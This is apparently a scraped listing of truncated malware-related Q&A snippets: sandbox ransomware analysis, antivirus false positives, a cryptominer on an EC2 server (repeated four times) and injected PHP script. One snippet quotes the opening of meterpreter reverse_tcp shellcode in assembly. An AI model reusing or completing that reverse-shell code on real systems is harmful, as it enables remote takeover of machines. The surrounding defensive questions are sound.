malware

问题 I study about ransomware behavior with cuckoo sandbox. I need to get encrypted files and threatening letter which those made by ransomware, but they exist on my Cuckoo Sandbox VM. How do I extract specific files from its VM? my environment: cuckoo sandbox 2.06 Host OS:Ubuntu 18.04 Guest OS:Windows7SP1x86(without guest additions) VM soft: Virtual Box 5.2 回答1: You can get the requiere time to handle your manipulatiuons by: 1- specify a hight number of second either using command line (ex -

问题 I've run into a very odd thing. I wrote a pretty simple program in C#, and tried to build a 32bit and a 64bit version of it. The 64bit version works fine, but whenever i try to build the 32bit version, my antivirus software removes it. I've uploaded both files to virustotal here: 32 bit: https://virustotal.com/da/file/fdb3d2870ce876b49eb5d9371fc0b133b7657ddd994603777a42a47f3eb09d8b/analysis/1461779525/ 64 bit: https://virustotal.com/da/file

问题 I extracted the assembly code of the windows/meterpreter/reverse_tcp payload with lhost set to 127.0.0.1 and lport set to 443 , however after building the assembly program with fasm the program crashes, any ideas as to why? assembly code: format PE console use32 entry start start: pusha mov ebp,esp xor edx,edx mov edx,[fs:edx+0x30] mov edx,[edx+0xc] mov edx,[edx+0x14] xor edi,edi movzx ecx,word [edx+0x26] mov esi,[edx+0x28] xor eax,eax lodsb cmp al,0x61 jl 0x27 sub al,0x20 ror edi, 0xd add

问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

问题 We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [root@hadoop002 tmp]# systemctl status 25177 ● session-5772.scope - Session 5772 of user root Loaded: loaded (/run/systemd/system/session-5772.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5772.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions

问题 Recently my C programs started to act weirdly and I had no idea why... Then I realized that they were being flagged by my antivirus program as malware... First I thought there's a malware in my compiler (I'm using CodeBlocks IDE with MinGW-GCC as c compiler), Antivirus scan returned nothing. So I started experimenting on it... I wrote a simple hello world using c #include <stdio.h> int main() { printf("Hello"); return 0; } Soon as I compiled it windows defender flagged it as Trojan:Win32

问题 I am working on a php website and it gets regularly infected by Malware. I've gone through all the security steps but failed. But I know how it every time infect my code. It comes at the starting of my php index file as following. <script>.....</script><? Can anybody please help me how can I remove the starting block code of every index file at my server folders? I will use a cron for this. I already gone through regex question for removal of javascript malware but did not found what I want.

问题 I am creating an android web app using Webview and Javascript making addJavascriptInterface(true) . My App will content data(html) that will be loaded from an external site. I worried about the cross-site-scripting XSS/security of my app as I am enabling addJavascriptInterface(true). What are the things I should be taking care so that any malicious code should not run on my app ? 回答1: I found a good study from Syracuse University called Attacks on WebView in the Android System, which